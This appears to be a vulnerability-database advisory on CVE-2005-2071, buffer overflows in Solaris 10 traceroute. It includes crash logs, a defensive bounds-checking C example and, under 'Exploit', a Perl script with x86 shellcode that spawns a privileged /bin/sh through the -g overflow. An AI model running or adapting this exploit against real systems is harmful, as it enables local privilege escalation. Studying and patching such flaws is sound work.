Sun Solaris traceroute multiple buffer overflow vulnerabilities

Vulnerability ID 1108890 Vulnerability type Permissions, privileges and access control
Published 2005-06-24 Updated 2005-06-24
CVE ID CVE-2005-2071
CNNVD ID CNNVD-200506-238
Platform Solaris CVSS score 4.6
|Sources
https://www.exploit-db.com/exploits/25896
https://www.securityfocus.com/bid/14049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-238
|Vulnerability details
Solaris is a commercial UNIX operating system developed and maintained by Sun. In Solaris 10, /usr/sbin/traceroute contains a buffer overflow in its handling of the -g (gateway) argument; a local attacker may be able to use it to elevate privileges on the system. When enough -g arguments are supplied, the IP address argument overwrites the saved return address:

atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 -g 9 -g 10 127.0.0.1
traceroute: too many IPv4 gateways
traceroute: unknown IPv4 host 1
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets
Segmentation fault (core dumped)
atari:root:/home/venglin# gdb /usr/sbin/traceroute core
[...]
Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 -g 9 -g 10 127.0.0'.
Program terminated with signal 11, Segmentation fault.
[...]
#0  0x0100007f in ?? ()

0x0100007f is 127.0.0.1 (the four address bytes 7f 00 00 01 read as a little-endian word). An attacker could use this to run arbitrary code; however, because the program uses __init_suid_priv(), the impact is limited to raw socket access. In addition, a malformed -s argument can cause heap corruption:

atari:root:/home/venglin# gdb /usr/sbin/traceroute core
[...]
#0  0xfee7178d in _free_unlocked () from /lib/libc.so.1
(gdb) bt
#0  0xfee7178d in _free_unlocked () from /lib/libc.so.1
#1  0xfee71752 in free () from /lib/libc.so.1
#2  0xfefa49a6 in freeaddrinfo () from /lib/libsocket.so.1
#3  0x08052a7a in main ()
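As an added example (not Solaris source and not the exploit below), the defect class above in defensive form: a gateway-list insert that enforces its bound before storing, so surplus -g arguments are refused instead of overwriting what follows the array, plus a helper showing why 127.0.0.1 appears as 0x0100007f in the program counter on little-endian x86. The limit of 8 gateways, the struct and the function names are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed limit: a 40-byte LSRR option holds 9 addresses, one of them the
 * destination, leaving room for 8 intermediate gateways. */
#define MAX_GATEWAYS 8
struct gateway_list { uint32_t addr[MAX_GATEWAYS]; int count; };

/* "a.b.c.d" -> host-order 32-bit value; 1 on success, 0 on bad input. */
int parse_ipv4(const char *s, uint32_t *out) {
    unsigned a, b, c, d; char tail;
    if (sscanf(s, "%u.%u.%u.%u%c", &a, &b, &c, &d, &tail) != 4) return 0;
    if (a > 255 || b > 255 || c > 255 || d > 255) return 0;
    *out = (a << 24) | (b << 16) | (c << 8) | d;
    return 1;
}

/* 127.0.0.1 sits in memory as 7f 00 00 01 (network order); an x86 CPU that
 * loads those bytes as a return address sees 0x0100007f, as gdb showed. */
uint32_t ipv4_bytes_as_le_word(uint32_t host_order) {
    return (host_order >> 24) | ((host_order >> 16) & 0xff) << 8
         | ((host_order >> 8) & 0xff) << 16 | (host_order & 0xff) << 24;
}

/* Hardened insert: the bound is checked BEFORE the store, so a surplus -g
 * is refused rather than written past addr[]. 0 on success, -1 on refusal. */
int add_gateway(struct gateway_list *gl, const char *arg) {
    uint32_t addr;
    if (gl->count >= MAX_GATEWAYS) {
        fprintf(stderr, "traceroute: too many IPv4 gateways\n");
        return -1;
    }
    if (!parse_ipv4(arg, &addr)) {
        fprintf(stderr, "traceroute: unknown IPv4 host %s\n", arg);
        return -1;
    }
    gl->addr[gl->count++] = addr;
    return 0;
}

/* Replays the advisory's run of ten -g arguments; returns how many were kept. */
int gateways_accepted(int n_args) {
    struct gateway_list gl = { {0}, 0 };
    int kept = 0;
    for (int i = 0; i < n_args; i++) {
        char buf[16];
        snprintf(buf, sizeof buf, "10.0.0.%d", i + 1);
        kept += (add_gateway(&gl, buf) == 0);
    }
    return kept;
}
```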
|Exploit
source: http://www.securityfocus.com/bid/14049/info

Sun Solaris traceroute is affected by multiple local buffer overflow vulnerabilities.

These vulnerabilities present themselves when the application handles excessive data supplied through command line arguments.

These issues are reported to affect /usr/sbin/traceroute running on Sun Solaris 10.

Some reports indicate that this issue cannot be reproduced. It is also reported that this issue is only exploitable on the Solaris x86 platform.

#!/usr/bin/perl

$ret = 0x8046bb0;  # heap, solaris on amd64

# padding followed by the payload; the '\x' escapes were lost in extraction and are restored here
$shellcode = "A" x 5000 .
"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68/bin\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

# encode the 32-bit address as a dotted quad, least significant byte first,
# so that its bytes land in memory in the order the overflow expects
$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret & 0xff0000) >> 16, ($ret & 0xff000000) >> 24);

# ten -g arguments, as in the advisory's crash, with the address as the destination
$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 -g 9 -g 10 $ip";

print $cmd, "\n";

system($cmd);
|Affected products
Sun Solaris 10.0_x86

Sun Solaris 10

|References

Source: BID
Name: 14049
Link: http://www.securityfocus.com/bid/14049
Source: VUPEN
Name: ADV-2005-2564
Link: http://www.frsirt.com/english/advisories/2005/2564
Source: SUNALERT
Name: 102060
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102060-1
Source: SECTRACK
Name: 1015261
Link: http://securitytracker.com/id?1015261
Source: SECUNIA
Name: 17708
Link: http://secunia.com/advisories/17708
Source: BUGTRAQ
Name: 20050624 Re: Solaris 10 /usr/sbin/traceroute vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111964580023012&w=2
Source: BUGTRAQ
Name: 20050624 Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111963809801731&w=2
Source: BUGTRAQ
Name: 20050624 Solaris 10 /usr/sbin/traceroute vulnerabilities
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111963068714114&w=2
